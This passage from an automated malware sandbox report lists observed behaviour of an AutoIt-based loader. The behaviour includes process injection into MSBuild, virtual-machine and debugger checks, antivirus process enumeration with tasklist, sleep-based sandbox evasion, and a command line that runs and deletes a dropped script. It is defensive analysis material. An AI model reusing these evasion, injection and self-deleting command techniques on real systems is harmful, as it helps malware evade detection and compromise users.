                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1106Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeAPI coverage: 5.7 %
                      Source: C:\edgheaa\AutoIt3.exeAPI coverage: 5.7 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 1.3 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368Thread sleep count: 1106 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368Thread sleep time: -33180000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2640Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_0073E180
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_0074A187
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_0074A2E4
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,35_2_0074A66E
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose,35_2_0074686D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose,35_2_0073E9BA
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007474F0 FindFirstFileW,FindClose,35_2_007474F0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,35_2_00747591
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_0073DE32
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,35_2_014A3ECD
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,35_2_014A17FD
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A3FD5 FindFirstFileA,GetLastError,35_2_014A3FD5
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA187
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDE180
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA2E4
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA66E
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose,38_2_00CE686D
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE9BA
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE74F0 FindFirstFileW,FindClose,38_2_00CE74F0
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,38_2_00CE7591
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDE32
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,38_2_01653765
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,38_2_01651095
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0165386D FindFirstFileA,GetLastError,38_2_0165386D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_006E310D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000Jump to behavior
                      Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: AutoIt3.exe, 0000002A.00000002.2498679993.00000000016A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Updater.exe, Updater.exe, 00000023.00000002.2238957940.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238485419.000000000143C000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2233287021.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000026.00000002.2409569799.000000000164A000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2409643770.000000000169A000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.0000000001685000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.00000000016D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                      Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001474000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B2CBF LdrInitializeThunk,35_2_014B2CBF
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074F607 BlockInput,35_2_0074F607
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,35_2_006E2D33
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_006E310D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F4BF4 mov eax, dword ptr fs:[00000030h]35_2_006F4BF4
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h]35_2_014B89A9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h]35_2_014B89A9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h]35_2_014B89A2
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h]35_2_014B89A2
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B2ABD mov eax, dword ptr fs:[00000030h]35_2_014B2ABD
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014C4916 mov eax, dword ptr fs:[00000030h]35_2_014C4916
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C94BF4 mov eax, dword ptr fs:[00000030h]38_2_00C94BF4
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01662355 mov eax, dword ptr fs:[00000030h]38_2_01662355
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01668241 mov eax, dword ptr fs:[00000030h]38_2_01668241
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01668241 mov eax, dword ptr fs:[00000030h]38_2_01668241
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0166823A mov eax, dword ptr fs:[00000030h]38_2_0166823A
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0166823A mov eax, dword ptr fs:[00000030h]38_2_0166823A
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_016741AE mov eax, dword ptr fs:[00000030h]38_2_016741AE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_00444A1B mov eax, dword ptr fs:[00000030h]41_2_00444A1B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0044CC02 mov eax, dword ptr fs:[00000030h]41_2_0044CC02
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007320BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,35_2_007320BE
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00702446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00702446
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F0E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_006F0E4D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F0F9F SetUnhandledExceptionFilter,35_2_006F0F9F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F11EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_006F11EE
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CA2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00CA2446
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C90E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00C90E4D
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C90F9F SetUnhandledExceptionFilter,38_2_00C90F9F
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00C911EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0042B08D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_0042B08D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0042A60E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_0042A60E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_00445700 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00445700
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeMemory protected: page readonly | page read and write | page write copy | page execute | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004080D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,41_2_004080D0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,35_2_0073230F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,35_2_006E2D33
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073C078 SendInput,keybd_event,35_2_0073C078
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00752E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,35_2_00752E89
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENTJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3xJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3xJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00731C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,35_2_00731C68
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00732777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,35_2_00732777
                      Source: Updater.exe, 0000001C.00000000.1722348560.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000495E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: Updater.exe, AutoIt3.exeBinary or memory string: Shell_TrayWnd
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F0CA4 cpuid 35_2_006F0CA4
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,35_2_014A19D5
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: GetLocaleInfoA,35_2_014A22F9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: GetLocaleInfoA,35_2_014A6959
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: GetLocaleInfoA,35_2_014A69A5
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,35_2_014A1ADF
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: GetLocaleInfoA,GetACP,35_2_014A7EF1
                      Source: C:\edgheaa\AutoIt3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,38_2_0165126D
                      Source: C:\edgheaa\AutoIt3.exeCode function: GetLocaleInfoA,38_2_016561F1
                      Source: C:\edgheaa\AutoIt3.exeCode function: GetLocaleInfoA,38_2_0165623D
                      Source: C:\edgheaa\AutoIt3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,38_2_01651377
                      Source: C:\edgheaa\AutoIt3.exeCode function: GetLocaleInfoA,GetACP,38_2_01657789
                      Source: C:\edgheaa\AutoIt3.exeCode function: GetLocaleInfoA,38_2_01651B91
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,41_2_0044F013
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,41_2_004585E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,41_2_00458597
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,41_2_0045867D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,41_2_00458708
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,41_2_0045895B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,41_2_0044EAF1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,41_2_00458A81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,41_2_00458B87
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,41_2_00458C56
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\edgheaa\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\edgheaa\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\edgheaa\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\edgheaa\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
